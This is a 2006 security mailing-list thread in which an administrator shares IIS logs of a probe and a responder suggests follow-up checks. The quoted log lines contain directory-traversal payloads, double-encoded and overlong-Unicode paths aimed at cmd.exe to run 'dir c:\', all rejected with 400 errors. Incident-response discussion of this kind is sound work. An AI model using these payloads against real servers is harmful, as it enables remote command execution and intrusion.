RE: IIS http error log entries...

Since your IIS Server responded with HTTP 400 responses, there's not
reason to panic.  However should consider doing some further
investigation.
> From a web server standpoint, you'll have reason to be concerned if your
IIS Server is generating HTTP 200 responses to requests that it's not
intended to serve, but from the snippet you provided below, that's not
the case.

A few thoughts off the top of my head to consider.
Has your company hired someone to perform a penetration test? (based on
the fact that the source IP coming from the Netherlands, the pen. test
theory is not likely)
It seems that this IIS Server is hosting an Internet site, is it on a
protected subnet within your network (DMZ), what else is on that subnet?
Is this Server hosting anything other than IIS? you'll probably want to
comb through more logs on that system and potentially on other servers
that have public exposure (Such as SMTP, DNS, other web servers, etc.)
Do your public DNS servers allow domain transfers to anyone on the
internet?  If so consider looking at each of those servers as well, or
contact the administrators of those servers if they are not your
responsibility.

-Cheers



-----Original Message-----
From: listbounce@securityfocus.com [mailto:listbounce@securityfocus.com]
On Behalf Of nemanja.janic@centroproizvod.co.yu
Sent: Tuesday, December 12, 2006 10:02 AM
To: focus-ms@securityfocus.com
Subject: IIS http error log entries...

Hello list,
i hope i got the right group,
i just found these in my IIS logs:

-----------------------

2006-12-08 11:38:18 87.17.7.5 2842 192.168.x.x 80 HTTP/1.0 HEAD
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
400 - URL -
2006-12-08 11:38:29 87.17.7.5 2929 192.168.x.x 80 HTTP/1.0 HEAD
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 -
URL -
2006-12-08 11:38:44 87.17.7.5 2872 192.168.x.x 80 HTTP/1.0 HEAD
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 -
URL -
2006-12-08 11:38:44 87.17.7.5 3420 192.168.x.x 80 HTTP/1.0 HEAD
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:58 87.17.7.5 1332 192.168.x.x 80 HTTP/1.0 HEAD
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32
/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:58 87.17.7.5 2105 192.168.x.x 80 HTTP/1.0 HEAD
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/
c+dir+c:\ 400 - URL -
2006-12-08 11:39:46 87.17.7.5 2435 192.168.x.x 80 - - - - -
Timer_MinBytesPerSecond -
2006-12-08 11:40:36 87.17.7.5 1933 192.168.x.x 80 - - - - -
Timer_MinBytesPerSecond -
2006-12-08 11:40:41 87.17.7.5 4144 192.168.x.x 80 - - - - -
Timer_MinBytesPerSecond -
2006-12-08 11:40:44 87.17.7.5 4234 192.168.x.x 80 HTTP/1.0 HEAD
/msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400
- URL -
2006-12-08 11:40:50 87.17.7.5 1130 192.168.x.x 80 HTTP/1.0 HEAD
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+c:\ 400 - URL -
2006-12-08 11:40:50 87.17.7.5 1411 192.168.x.x 80 HTTP/1.0 HEAD
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
400 - URL -
2006-12-08 11:41:11 87.17.7.5 1427 192.168.x.x 80 - - - - -
Timer_MinBytesPerSecond -
2006-12-08 11:41:24 87.17.7.5 4715 192.168.x.x 80 HTTP/1.0 HEAD
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn
t/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:41:35 87.17.7.5 1568 192.168.x.x 80 HTTP/1.0 HEAD
/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:
\ 400 - URL -
2006-12-08 11:41:41 87.17.7.5 4751 192.168.x.x 80 - - - - -
Timer_MinBytesPerSecond -
2006-12-08 11:41:44 87.17.7.5 1595 192.168.x.x 80 HTTP/1.0 HEAD
/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -

-------------------------

I don't have much expirience with this kind of thing, and from digging
the net i found that this was used in Nimda attacks few years ago... any
idea what's going on? Should i be worried?

------------------------------------------------------------------------
---
------------------------------------------------------------------------
---





Blue Cross Blue Shield of Florida, Inc., and its subsidiary and affiliate 
companies are not responsible for errors or omissions in this e-mail message. 
Any personal comments made in this e-mail do not reflect the views of Blue 
Cross Blue Shield of Florida, Inc.  The information contained in this document 
may be confidential and intended solely for the use of the individual or entity 
to whom it is addressed.  This document may contain material that is privileged 
or protected from disclosure under applicable law.  If you are not the intended 
recipient or the individual responsible for delivering to the intended 
recipient, please (1) be advised that any use, dissemination, forwarding, or 
copying of this document IS STRICTLY PROHIBITED; and (2) notify sender 
immediately by telephone and destroy the document. THANK YOU.


---------------------------------------------------------------------------
---------------------------------------------------------------------------